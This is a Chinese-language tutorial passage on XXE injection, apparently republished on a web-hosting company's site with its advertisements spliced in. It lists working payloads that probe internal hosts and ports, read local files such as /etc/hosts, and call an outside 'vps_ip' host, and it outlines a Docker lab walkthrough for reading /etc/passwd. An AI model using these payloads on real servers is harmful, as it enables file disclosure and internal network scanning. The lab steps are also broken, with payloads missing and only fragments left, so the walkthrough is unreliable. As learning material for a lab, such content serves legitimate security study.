189 8069 5689

利用xxe获取linux系统的passwd-创新互联

引用外部DTD文件访问内网主机/端口。

创新互联公司2013年成立,是专业互联网技术服务公司,拥有项目成都网站建设、网站制作网站策划,项目实施与项目整合能力。我们以让每一个梦想脱颖而出为使命,1280元扬中做网站,已为上家服务,为扬中各地企业和个人服务,联系电话:13518219792

<!DOCTYPE a SYSTEM "http://127.0.0.1:2333"> (看响应时间)

引用外部DTD文件访问wai网。

<!DOCTYPE a SYSTEM "http://vps_ip" >

引用内部实体。

<!DOCTYPE a [<!ENTITY xxe "findneo">]><a>&xxe;</a>

外部实体读本地文件。

<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><a>&xxe;</a>

外部实体访问内wang主机端口。

<!DOCTYPE a SYSTEM "http://192.168.1.2:80">(看响应时间)

外部实体访问wai网。

<!DOCTYPE a [<!ENTITY xxe SYSTEM "http://vps_ip">]><a>&xxe;</a>

docker中下载rrodrigo/xxelab该镜像

启动:docker run -d -p 8082:80 rrodrigo/xxelab

利用xxe获取linux系统的passwd

抓取注册包,发现采用xml格式传递,且邮箱有返回:

利用xxe获取linux系统的passwd

将返回内容处进行xxe回显设置读取/etc/passwd



]>

利用xxe获取linux系统的passwd

利用base64编码进行xxe,防止有返回包验证



]>

利用xxe获取linux系统的passwd
返回base64数据包,base64解码

利用xxe获取linux系统的passwd

另外有需要云服务器可以了解下创新互联cdcxhl.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


当前题目:利用xxe获取linux系统的passwd-创新互联
新闻来源:http://cdxtjz.cn/article/cdseid.html

其他资讯